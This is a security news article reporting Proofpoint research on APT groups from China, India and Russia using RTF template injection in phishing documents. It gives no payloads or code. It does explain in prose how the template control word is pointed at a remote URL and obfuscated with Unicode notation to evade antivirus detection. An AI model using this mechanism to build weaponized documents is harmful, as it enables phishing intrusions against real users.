Security Affairs
FBI: TeamPCP Compromised Dev Tools to Steal Cloud Credentials|Pegasus Used Against MEP Investigating Pegasus, Citizen Lab Finds|JADEPUFFER: First End-to-End AI-Driven Ransomware Operation|The Anatomy of a Shadow AI Supply-Chain Breach: Lessons from the 2026 Vercel Incident|Law enforcememt operation disrupted Malicious Residential Proxy Networks NetNut|Government and Healthcare Are the Weakest Links in Global Email Security|Europe Confirms Record €4.1B Penalty Against Google for Android Practices|U.S. CISA adds a Microsoft SharePoint Server flaw to its Known Exploited Vulnerabilities catalog|430,000 FortiGate Devices Exposed in FortiBleed Ransomware Link|Adobe fixed multiple maximum-severity flaws in ColdFusion and Campaign Classic|Alleged Scattered Spider Hacker Extradited to U.S. to Face Cybercrime Charges|Oracle E-Business Suite Flaw Under Active Attack, 950 Systems Exposed|FBI: TeamPCP Compromised Dev Tools to Steal Cloud Credentials|Pegasus Used Against MEP Investigating Pegasus, Citizen Lab Finds|JADEPUFFER: First End-to-End AI-Driven Ransomware Operation|The Anatomy of a Shadow AI Supply-Chain Breach: Lessons from the 2026 Vercel Incident|Law enforcememt operation disrupted Malicious Residential Proxy Networks NetNut|Government and Healthcare Are the Weakest Links in Global Email Security|Europe Confirms Record €4.1B Penalty Against Google for Android Practices|U.S. CISA adds a Microsoft SharePoint Server flaw to its Known Exploited Vulnerabilities catalog|430,000 FortiGate Devices Exposed in FortiBleed Ransomware Link|Adobe fixed multiple maximum-severity flaws in ColdFusion and Campaign Classic|Alleged Scattered Spider Hacker Extradited to U.S. to Face Cybercrime Charges|Oracle E-Business Suite Flaw Under Active Attack, 950 Systems Exposed|
Advertisement

Ad Placeholder

Full Width × 90

APT

New RTF Template Inject technique used by APT groups in recent attacks

Nation-state actors from China, India, and Russia, were spotted using a novel RTF template injection technique in recent attacks. APT groups from China, India, and Russia have used a new RTF (rich text format) template injection technique in recent phishing attacks. The technique was first reported by the security firm Proofpoint spotted which observed phishing […]

RTF template injection technique

Nation-state actors from China, India, and Russia, were spotted using a novel RTF template injection technique in recent attacks.

APT groups from China, India, and Russia have used a new RTF (rich text format) template injection technique in recent phishing attacks.

The technique was first reported by the security firm Proofpoint spotted which observed phishing campaigns using the weaponized RTF template injection since March 2021. The experts believe that nation-state actors will continue to use the technique in future campaigns.

The RTF template injection technique abuses legitimate RTF template functionality to subvert the plain text document formatting properties of the file and retrieve a malicious payload from a remote server instead of a file resource via an RTF’s template control word capability. The feature used by attackers allow to load an RTF template from a specific URL resource instead of a local file resource. Threat actors simply replace a legitimate file destination with a malicious download link. 

Experts pointed out that the technique has a lower detection rate by public antivirus engines when compared to the Office-based template injection technique.

“Proofpoint has identified distinct phishing campaigns utilizing the technique which have been attributed to a diverse set of APT threat actors in the wild. While this technique appears to be making the rounds among APT actors in several nations, Proofpoint assesses with moderate confidence, based on the recent rise in its usage and the triviality of its implementation, that it could soon be adopted by cybercriminals as well.” reads the analysis published by ProofPoint.

“By altering an RTF file’s document formatting properties, specifically the document formatting control word for “\*\template” structure, actors can weaponize an RTF file to retrieve remote content by specifying a URL resource instead of an accessible file resource destination.”

In the attacks observed by the researchers, threat actors used Unicode signed character notation to obfuscate the URL value included in the RTF file. The trick was used in the attempt to evade static detection signatures in anti-virus engines.

RTF template injection technique

The attack also works when in the case of .doc.rtf files that are opened utilizing Microsoft Word. When an RTF Remote Template Injection file is opened with MS Word, the application will retrieve the resource from the specified URL before displaying the content of the file. 

Proofpoint reported it observed the technique was used by DoNot Team, Gamaredon, and a TA423 APT groups.

RTF Template Injection 2

“The viability of XML Office based remote template documents has proven that this type of delivery mechanism is a durable and effective method when paired with phishing as an initial delivery vector. The innovation by threat actors to bring this method to a new file type in RTFs represents an expanding surface area of threat for organizations worldwide.” concludes the report. “While this method currently is used by a limited number of APT actors with a range of sophistication, the technique’s effectiveness combined with its ease of use is likely to drive its adoption further across the threat landscape.”

Proofpoint shared YARA signatures for the attacks using this technique.

Follow me on Twitter: @securityaffairs and Facebook

[adrotate banner=”9″][adrotate banner=”12″]

Pierluigi Paganini

(SecurityAffairs – hacking, RTF template injection)

[adrotate banner=”5″]

[adrotate banner=”13″]